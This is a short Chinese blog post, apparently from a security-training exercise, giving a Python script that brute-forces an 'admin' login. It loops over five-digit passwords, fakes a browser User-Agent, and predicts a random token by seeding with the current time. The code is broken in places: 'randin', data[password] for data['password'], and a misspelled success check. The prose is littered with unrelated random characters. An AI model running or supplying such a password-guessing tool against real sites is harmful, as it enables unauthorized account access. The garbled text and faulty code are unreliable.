做一個(gè)python的登錄口爆破小工具
在培訓(xùn)的時(shí)候?qū)W到的一個(gè)python小工具,利用循環(huán)遍歷口令绢记,要求是:不能使用bp爆破蠢熄,要通過python自己寫,就很蛋疼炉旷,考試沒會(huì)饥追,現(xiàn)在想想真菜,不能通過bp爆破是因?yàn)榧恿艘粋€(gè)隨機(jī)生成的token但绕,給了源代碼也沒看出來捏顺,也很蛋疼草丧。
開始吧!
用到模塊:requests诈泼,time铐达,random
#引用模塊
from requests import *
from time import *
from random import *
#設(shè)置請(qǐng)求頭岖赋,偽造User-Agents
head = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36'}
#?用戶admin和密碼五位數(shù)
password = 10000
url="要爆破的網(wǎng)址"
#將源代碼生成的token的值拿用
seed(int(time()))
token = randin(111111,999999)
se = session()
data={'username':'admin','password':'','token':''}? ? ?#設(shè)置password和token值為空,在循環(huán)體內(nèi)賦值
while password < 99999:
? ? data[password]=int(password)
????data[token]=int(token)
? ? request = post(url,head,data)
? ? if 'seccuss' in request.text:
? ? ? ? print(request.text)
? ? ? ? print("爆破成功瓮孙,密碼為",password)
? ? ? ? break
? ? password+=1
鏈接:
requests:https://docs.python-requests.org/zh_CN/latest/
HTTP請(qǐng)求方法:https://www.cnblogs.com/yinrw/p/10694474.html#
聲明:此文章用于學(xué)習(xí),請(qǐng)勿去爆破網(wǎng)站。
